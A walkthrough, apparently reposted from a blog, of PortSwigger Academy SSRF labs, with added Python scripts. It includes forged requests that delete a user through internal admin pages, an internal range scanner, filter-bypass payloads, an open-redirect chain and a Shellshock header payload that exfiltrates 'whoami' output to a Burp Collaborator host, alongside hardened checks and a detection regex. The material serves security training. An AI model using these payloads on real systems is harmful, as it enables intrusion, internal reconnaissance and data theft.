PortSwigger SSRF Labs
Author: Internet
Basic SSRF against the local server
Lab
Description
This lab has a stock check feature which fetches data from an internal system.
To solve the lab, change the stock check URL to access the admin interface at http://localhost/admin and delete the user carlos.
Solution
Open any product page and click "Check stock"; a POST request is sent.
Its form data is:
stockApi:http://stock.weliketoshop.net:8080/product/stock/check?productId=2&storeId=1
Forge the request from the browser console and try to reach the admin interface (the missing closing quote in the body string has been fixed):
fetch('https://ac731fad1e7cf971c0a505b80009004c.web-security-academy.net/product/stock',{method:'POST', headers: {
"Content-type": "application/x-www-form-urlencoded; charset=UTF-8",
}, body: "stockApi=http://localhost/admin"}).then(r => r.text()).then(console.log)
Inspect the response: it contains the <a> tag of the delete-user button, whose link is /admin/delete?username=carlos. Forge that request and the user is deleted:
fetch('https://ac731fad1e7cf971c0a505b80009004c.web-security-academy.net/product/stock',{method:'POST', headers: {
"Content-type": "application/x-www-form-urlencoded; charset=UTF-8",
}, body: "stockApi=http://localhost/admin/delete?username=carlos"})
Basic SSRF against another back-end system
Lab
basic-ssrf-against-backend-system
Description
This lab has a stock check feature which fetches data from an internal system.
To solve the lab, use the stock check functionality to scan the internal 192.168.0.X range for an admin interface on port 8080, then use it to delete the user carlos.
Solution
Submit a stock check request, send it to Repeater and modify the stockApi field.
Use Burp Suite Intruder to send a request to every host that could exist in the internal range; 192.168.0.170 responds differently from the rest (a 404), so it is probably the host running the admin interface.
Send a request to .170 to reach the admin interface:
http://192.168.0.170:8080/admin
Inspect the response: it contains the <a> tag of the delete-user button, whose link is /admin/delete?username=carlos. Forge that request and the user is deleted:
http://192.168.0.170:8080/admin/delete?username=carlos
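The Intruder step above, scripted. This is an added example and not part of the original write-up or the lab: the lab hostname `LAB` is a placeholder you replace with your own instance, the form field name `stockApi` and the `/product/stock` endpoint come from the page, and hosts are compared on HTTP status only. The sender is injectable so the scan logic can be exercised without a network.

```python
"""Scan 192.168.0.1-254 for an admin interface on port 8080 through the stock-check SSRF."""
import urllib.error
import urllib.parse
import urllib.request
from typing import Callable, List, Tuple

LAB = "https://YOUR-LAB-ID.web-security-academy.net"   # placeholder, not a real lab id


def stock_check_body(internal_url: str) -> bytes:
    """Form body the stock checker expects; the server then fetches `stockApi` itself."""
    return urllib.parse.urlencode({"stockApi": internal_url}).encode()


def http_send(url: str, body: bytes) -> int:
    """Real sender: POST the form and return the status code (4xx/5xx included, 0 on no answer)."""
    req = urllib.request.Request(url, data=body, method="POST")
    req.add_header("Content-Type", "application/x-www-form-urlencoded")
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.status
    except urllib.error.HTTPError as e:
        return e.code
    except urllib.error.URLError:
        return 0


def scan_internal_range(send: Callable[[str, bytes], int],
                        prefix: str = "192.168.0", port: int = 8080,
                        path: str = "/admin") -> List[Tuple[str, int]]:
    """Try every host in the /24 and return the ones whose status differs from the majority.
    Unreachable hosts all produce the same status, so the outliers are the live candidates."""
    results = {}
    for x in range(1, 255):
        target = f"http://{prefix}.{x}:{port}{path}"
        results[target] = send(f"{LAB}/product/stock", stock_check_body(target))
    statuses = list(results.values())
    baseline = max(set(statuses), key=statuses.count)
    return [(t, s) for t, s in results.items() if s != baseline]


if __name__ == "__main__":
    for target, status in scan_internal_range(http_send):
        print(status, target)
```

Once a candidate is found, the same `stock_check_body` with `.../admin/delete?username=carlos` performs the deletion.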
SSRF with blacklist-based input filter
Lab
Description
This lab has a stock check feature which fetches data from an internal system.
To solve the lab, change the stock check URL to access the admin interface at http://localhost/admin and delete the user carlos.
The developer has deployed two weak anti-SSRF defenses that you will need to bypass.
Solution
Submit a stock check request, send it to Repeater and modify the stockApi field.
Try the usual admin interface addresses:
http://localhost:8080/admin
http://127.0.0.1:8080/admin
Try variants of the address:
http://127.1:8080/admin \\ blocked
URL-encode the a in admin:
http://127.1:8080/%61dmin \\ blocked
Encode the % as well (double URL encoding):
http://127.1:8080/%2561dmin \\ success
So the target blocks sensitive addresses such as localhost and 127.0.0.1 as well as the keyword admin. 127.1 is an alternative notation for the loopback address that the blacklist does not recognise, and %2561dmin gets through because the filter URL-decodes the input only once before matching (which is why %61dmin is still caught) while the back end decodes it a second time.
Inspect the response: it contains the <a> tag of the delete-user button, whose link is /admin/delete?username=carlos. Forge that request and the user is deleted:
http://127.1/%2561dmin/delete?username=carlos
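A reconstruction of the two bypasses above, with a hardened check beside the weak one. This is an added example, not the lab's code: `weak_blacklist` and `backend_resolves` emulate the behaviour the attempts above revealed (substring matching after one round of URL decoding, a second decode and loose address parsing downstream); the real filter's source is not public, and `ALLOWED_HOSTS` is an assumption.

```python
"""Why 127.1 and %2561dmin slip past the blacklist, and a check that does not."""
import ipaddress
import socket
from urllib.parse import unquote, urlsplit

BLOCKED_HOSTS = ("localhost", "127.0.0.1")
BLOCKED_WORDS = ("admin",)
ALLOWED_HOSTS = ("stock.weliketoshop.net",)   # assumption: the only legitimate stock back end


def weak_blacklist(url: str) -> bool:
    """True if the filter lets the URL through: decode once, then substring-match."""
    decoded = unquote(url).lower()
    if any(h in decoded for h in BLOCKED_HOSTS):
        return False
    return not any(w in decoded for w in BLOCKED_WORDS)


def backend_resolves(url: str) -> tuple:
    """(host, path) the request actually lands on: the stock checker forwards the
    once-decoded URL, the target web server decodes the path again when routing,
    and the OS resolver accepts shorthand dotted forms such as 127.1."""
    parts = urlsplit(unquote(url))
    host = parts.hostname or ""
    try:
        host = socket.inet_ntoa(socket.inet_aton(host))   # '127.1' -> '127.0.0.1'
    except OSError:
        pass                                              # not an IPv4 literal
    return host, unquote(parts.path)


def strict_check(url: str) -> bool:
    """Hardened check: decide on normalised, fully decoded components, not substrings.
    (A real deployment must also resolve the hostname and test the resulting address.)"""
    host, path = backend_resolves(url)
    try:
        ip = ipaddress.ip_address(host)
        if ip.is_loopback or ip.is_private or ip.is_link_local:
            return False
    except ValueError:
        pass                                              # a hostname, not an address
    return host in ALLOWED_HOSTS and "admin" not in path.lower()


if __name__ == "__main__":
    for u in ("http://localhost:8080/admin", "http://127.1:8080/%61dmin", "http://127.1:8080/%2561dmin"):
        print(u, "filter passes:", weak_blacklist(u), "lands on:", backend_resolves(u), "strict:", strict_check(u))
```

The point of `backend_resolves` is that the filter and the component that makes the request see different strings; a check is only meaningful if it is applied to exactly what will be connected to.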
SSRF with whitelist-based input filter
Lab
Description
This lab has a stock check feature which fetches data from an internal system.
To solve the lab, change the stock check URL to access the admin interface at http://localhost/admin and delete the user carlos.
The developer has deployed an anti-SSRF defense you will need to bypass.
Solution
http://localhost%2523@stock.weliketoshop.net/admin/delete?username=carlos
The whitelist only checks that the hostname of the submitted URL is stock.weliketoshop.net. In the payload above the checker parses localhost%2523 as credentials placed before the allowed host and accepts the URL; the back end then URL-decodes once more, %2523 becomes #, and everything from @stock.weliketoshop.net onwards turns into a URL fragment, so the request actually goes to localhost/admin/delete?username=carlos.
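A parser-level view of why that payload works. This is an added example, not the lab's code: it reconstructs what the payload implies (the checker validates the hostname after at most one URL-decode, the back end decodes once more before connecting) using Python's `urlsplit`, whose authority/fragment splitting matches the behaviour the lab exhibits.

```python
"""How http://localhost%2523@stock.weliketoshop.net/... satisfies a host whitelist."""
from urllib.parse import unquote, urlsplit

ALLOWED_HOST = "stock.weliketoshop.net"


def decode_n(url: str, n: int) -> str:
    """Apply `n` rounds of URL decoding (%2523 -> %23 -> #)."""
    for _ in range(n):
        url = unquote(url)
    return url


def whitelist_check(url: str, decodes: int = 1) -> bool:
    """The weak check: parse after `decodes` rounds and compare the hostname only."""
    return urlsplit(decode_n(url, decodes)).hostname == ALLOWED_HOST


def backend_target(url: str, decodes: int = 2) -> str:
    """Host the back end actually connects to after its own extra decode."""
    return urlsplit(decode_n(url, decodes)).hostname or ""


def parse_stages(url: str, rounds: int = 3):
    """(url, hostname, fragment) after 0, 1, 2 ... decodes: shows where '@' flips from
    'credentials before the allowed host' to 'text inside a fragment'."""
    stages = []
    for i in range(rounds):
        u = decode_n(url, i)
        p = urlsplit(u)
        stages.append((u, p.hostname, p.fragment))
    return stages


def strict_whitelist_check(url: str) -> bool:
    """Hardened: decode to a fixed point before parsing and refuse userinfo outright,
    so no later decoding step can move the host boundary."""
    prev = None
    while prev != url:
        prev, url = url, unquote(url)
    p = urlsplit(url)
    return p.username is None and p.password is None and p.hostname == ALLOWED_HOST


if __name__ == "__main__":
    for stage in parse_stages("http://localhost%2523@stock.weliketoshop.net/admin/delete?username=carlos"):
        print(stage)
```

The single-encoded %23 and the raw # are rejected by the same weak check, which is exactly the progression seen when trying the variants in Repeater; the double encoding survives one decode and is only "unwrapped" where the connection is made.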
SSRF with filter bypass via open redirection
Lab
ssrf-filter-bypass-via-open-redirection
Description
This lab has a stock check feature which fetches data from an internal system.
To solve the lab, change the stock check URL to access the admin interface at http://192.168.0.12:8080/admin and delete the user carlos.
The stock checker has been restricted to only access the local application, so you will need to find an open redirect affecting the application first.
Solution
On a product page there is a "Next product" button in the bottom right; clicking it produces a response that redirects to another product. Its request URL is:
https://acd71f141e5d1066c0e1311800a400ca.web-security-academy.net/product/nextProduct?currentProductId=1&path=/product?productId=2
The request that can reach the internal network is the stock check, and the parameter that controls the redirect target is path, so combine the two:
stockApi=/product/nextProduct?path=http://192.168.0.12:8080/admin
Delete the user:
/product/nextProduct?path=http://192.168.0.12:8080/admin/delete?username=carlos
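The chain above in miniature, with the fix beside it: a fetcher that validates only the first URL follows the open redirect into 192.168.0.12, while one that re-validates every Location header stops at the hop. This is an added example, not the lab's code; the lab hostname is a placeholder and `fake_fetch` is a constructed stand-in for the server (it reflects the `path` parameter into a 302 the way the nextProduct endpoint does) so the example runs offline.

```python
"""Why an open redirect defeats a 'local application only' SSRF filter, and the fix."""
from typing import Callable, List, Tuple
from urllib.parse import parse_qs, urljoin, urlsplit

LAB = "https://YOUR-LAB-ID.web-security-academy.net"   # placeholder, not a real lab id
REDIRECTS = (301, 302, 303, 307, 308)


def fake_fetch(url: str) -> Tuple[int, str]:
    """Constructed stand-in for the lab: returns (status, Location). /product/nextProduct is the
    open redirect, the internal admin host answers 200, everything else 404."""
    p = urlsplit(url)
    if p.path == "/product/nextProduct":
        return 302, parse_qs(p.query).get("path", ["/"])[0]
    if url == "http://192.168.0.12:8080/admin":
        return 200, ""
    return 404, ""


def local_only(url: str) -> bool:
    """The stock checker's restriction: only the local application (relative path or same host)."""
    netloc = urlsplit(url).netloc
    return netloc == "" or netloc == urlsplit(LAB).netloc


def follow(start: str, fetch: Callable[[str], Tuple[int, str]],
           check_each_hop: bool, max_hops: int = 5) -> List[str]:
    """Return the chain of URLs actually requested.  With check_each_hop=False only the initial
    URL is validated (the vulnerable behaviour); with True every redirect target is checked
    against the same rule before it is followed."""
    url = urljoin(LAB, start)
    if not local_only(url):
        return []
    chain = [url]
    for _ in range(max_hops):
        status, location = fetch(url)
        if status not in REDIRECTS or not location:
            break
        nxt = urljoin(url, location)
        if check_each_hop and not local_only(nxt):
            break                       # hardened: the redirect points off the allowed origin
        chain.append(nxt)
        url = nxt
    return chain


if __name__ == "__main__":
    attack = "/product/nextProduct?path=http://192.168.0.12:8080/admin"
    print("vulnerable:", follow(attack, fake_fetch, check_each_hop=False))
    print("hardened:  ", follow(attack, fake_fetch, check_each_hop=True))
```

Disabling redirect following in the server-side client altogether is the simpler fix when the feature does not need it; re-validating each hop is the option when it does.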
Out-of-band SSRF
Lab
Description
This site uses analytics software which fetches the URL specified in the Referer header when a product page is loaded.
To solve the lab, use this functionality to cause an HTTP request to the public Burp Collaborator server.
Note
To prevent the Academy platform being used to attack third parties, our firewall blocks interactions between the labs and arbitrary external systems. To solve the lab, you must use Burp Collaborator's default public server.
Solution
As the description says, add a Referer header to a product page request whose value is the public Burp Collaborator host; the lab server then makes an HTTP request to it, which shows up in the Collaborator client:
Referer: http://qwqwzb4hl8l5fsfwapepv89orfx5lu.burpcollaborator.net
Blind SSRF with Shellshock exploitation
Lab
Note
To prevent the Academy platform being used to attack third parties, our firewall blocks interactions between the labs and arbitrary external systems. To solve the lab, you must use Burp Collaborator's default public server.
Solution
This lab relies on Shellshock, CVE-2014-6271.
When Bash starts it imports environment variables, and a value that begins with "() {" is parsed as a function definition.
A vulnerable Bash keeps parsing past the closing brace of that definition, so anyone who controls an environment variable can append commands that they otherwise have no way of running, and Bash executes them while importing the variable.
The lab runs analytics on the Referer header of requests, so the SSRF is delivered through Referer:
Referer: http://192.168.0.1:8080
I don't quite understand this part: the User-Agent header is replaced with the Shellshock payload, but why would the server execute the code in User-Agent?
Explanation (original link: https://blog.csdn.net/fish43237/article/details/39609031):
A Linux web server usually exposes a CGI interface, which allows Bash commands to be executed remotely;
the CGI handler treats HTTP headers as environment variables and sets them as temporary environment variables through Bash's env-related functions;
the HTTP protocol allows the client to send arbitrary custom headers;
together this gives a complete Bash command injection scenario: the client deliberately sends a crafted header containing the attack command, the server calls the function that sets environment variables and directly executes the command in the header the client specified, and even returns the result to the client.
In other words, the server's CGI interface hands the User-Agent value to the CGI program as an environment variable (HTTP_USER_AGENT); when that program is Bash, or spawns Bash, importing the variable triggers Shellshock and the command in the header runs.
Any header can carry the script you want to run; it does not have to be User-Agent.
0klo95947boi08knziv98mqe85ev2k.burpcollaborator.net is the public Collaborator host Burp generated; it receives the data that $(whoami) exfiltrates out of band.
Put this payload in the value of any header field:
() { :; }; /usr/bin/nslookup $(whoami).0klo95947boi08knziv98mqe85ev2k.burpcollaborator.net
The Collaborator interaction reveals the user name peter-9NpLEr; submit it to solve the lab.
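Two sides of the same mechanism: how a CGI server turns a header into the environment variable Bash imports, and a log check that flags the function-definition prefix the payload above relies on. This is an added example, not part of the original post: the header-to-variable mapping follows RFC 3875, `local_bash_vulnerable` runs the classic env probe against whatever Bash is on the machine executing it (patched Bash prints only the echo), and the log lines are constructed for the example, reusing the Referer and Collaborator host from the walkthrough.

```python
"""Header -> CGI environment variable -> Bash, and a detection over access-log lines."""
import re
import shutil
import subprocess
from typing import Dict, List


def cgi_env(headers: Dict[str, str]) -> Dict[str, str]:
    """RFC 3875 meta-variables: 'User-Agent' becomes HTTP_USER_AGENT, value copied verbatim.
    This is the step that puts attacker-controlled text into the environment a CGI script inherits."""
    return {"HTTP_" + name.upper().replace("-", "_"): value for name, value in headers.items()}


# A vulnerable Bash treats an imported value starting with '() {' as a function definition and,
# before the fix, kept executing whatever followed the closing brace.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{[^}]*\}\s*;")


def is_shellshock(value: str) -> bool:
    """True if the string carries the function-definition prefix with trailing commands."""
    return bool(SHELLSHOCK_RE.search(value))


def scan_access_log(lines: List[str]) -> List[str]:
    """Return log lines whose quoted header fields (Referer / User-Agent) carry the payload."""
    return [ln for ln in lines if is_shellshock(ln)]


def local_bash_vulnerable() -> bool:
    """Classic env-based probe: export a crafted variable and start a new bash.
    Returns True only on an unpatched bash; a patched one just prints 'probe'."""
    bash = shutil.which("bash")
    if bash is None:
        return False
    out = subprocess.run([bash, "-c", "echo probe"],
                         env={"X": "() { :; }; echo VULNERABLE"},
                         capture_output=True, text=True)
    return "VULNERABLE" in out.stdout


# Constructed, Apache combined-format style: a normal hit, then one carrying the lab payload.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2022:10:00:00 +0000] "GET /cgi-bin/stats HTTP/1.1" 200 12 '
    '"http://192.168.0.1:8080" "Mozilla/5.0"',
    '10.0.0.9 - - [01/Jan/2022:10:00:01 +0000] "GET /cgi-bin/stats HTTP/1.1" 200 12 "-" '
    '"() { :; }; /usr/bin/nslookup $(whoami).0klo95947boi08knziv98mqe85ev2k.burpcollaborator.net"',
]


if __name__ == "__main__":
    print(cgi_env({"User-Agent": "() { :; }; /usr/bin/nslookup $(whoami).example.invalid"}))
    print("flagged:", scan_access_log(SAMPLE_LOG))
    print("this machine's bash vulnerable:", local_bash_vulnerable())
```

The regex is deliberately narrow (it wants the closing brace and a following semicolon), which keeps it quiet on ordinary traffic but means whitespace-only variants of the prefix deserve a second, looser rule in a real ruleset.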
Tags: http,SSRF,admin,Portswigger,lab,8080,靶场,carlos,stock Source: https://www.cnblogs.com/zhoujinxuan/p/16292419.html